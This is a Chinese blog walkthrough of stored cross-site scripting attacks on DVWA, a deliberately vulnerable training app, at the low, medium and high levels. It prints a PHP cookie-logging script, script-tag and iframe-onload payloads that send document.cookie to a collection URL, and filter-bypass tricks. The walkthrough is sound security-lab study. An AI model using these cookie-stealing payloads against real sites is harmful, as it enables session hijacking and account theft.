【DVWA(五)】XXS存储型跨站攻击
XSS存儲型跨站攻擊(Stored Cross Site Scripting)
前言:
相較于XSS反射型跨站攻擊,存儲型具有更嚴重的危害,如果在竊取信息的同時對網頁沒有任何變化,那受害者將很難發現。
如果我有寫的不太明白的地方,可以先看看之前XSS反射型跨站攻擊的隨筆
low:
1.觀察:
測試輸入模式,有兩個輸入框,經測試,都有輸入限制,這個限制用網頁查看器很容易解決,我給改成了1000,其實不改也可以,就是在message里輸入payload也可以的;
2.輸入:
alert測試
<script>alert("test")</script>3.刷新:
此時已經將有攻擊的腳本數據傳到數據庫了,刷新之后就會彈出alert,觸發xss!
這就是存儲型XSS攻擊的厲害之處了,只要任何人訪問此網址,都會觸發,因此比反射型更加嚴重!
現在clear掉數據庫信息,開始正式進行攻擊。
4.php代碼:
在www里新建php文件,用于偷取cookie:
<?php$cookie=$_GET['cookie']; file_put_contents('get_low_dvwa_cookie.txt',$cookie);?>5.構造JS代碼:
這次采取與反射型不同的方式,不在輸入框里直接輸入js代碼段,而是在www下寫腳本文件,然后利用標簽加載網址對應的js代碼
新建JS文件steal.js:
6.XSS攻擊加載JS代碼:
構造payload:
name:<script src="http://127.0.0.1/steal.js"></script>
message:steal
提交之后可以看見,界面跳轉了,說明攻擊成功
7.隱蔽:
現在攻擊成功,但是跳轉界面容易讓用戶懷疑,所以進一步調整,盡量隱蔽,能夠不引起直觀變化的情況下進行攻擊獲取cookie。
利用ajax,在不刷新的情況下偷取cookie!挖坑XD
medium:
用大小寫組合,繞過對于<script>的處理:
<SCRIPT> <scr<script>ipt>接下來和low一樣了。其實這里跟反射型的XSS大同小異。
high:
1.用alert嘗試
不行
2.用大小寫組合嘗試
不行
3.換標簽
用?<iframe onload=alert("test")>?測試,可行!
4.構造payload:
name:<iframe οnlοad=document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie>
message:steal
成功!
impossible:
暫時依舊無解
后記
因為是存儲型,所以測試的時候會出現,一直跳轉的情況,所以在后臺把記錄刪掉就好了。
然后是合天網安相關部分的兩個思考:
1)反射型跨站和存儲型跨站的區別和利用方法的不同?
反射型是偏向實時的,點對點的最有效,把鏈接發送給某個人,這樣最好了;然后存儲型是大范圍撒網,一旦形成了攻擊,存進了數據庫,就有大把的數據了!
2)如何結合CSRF漏洞攻擊?
暫時還沒搞這部分,留坑
轉載于:https://www.cnblogs.com/wayne-tao/p/11079859.html
總結
以上是生活随笔為你收集整理的【DVWA(五)】XXS存储型跨站攻击的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 01_Python
- 下一篇: Event-based Vision: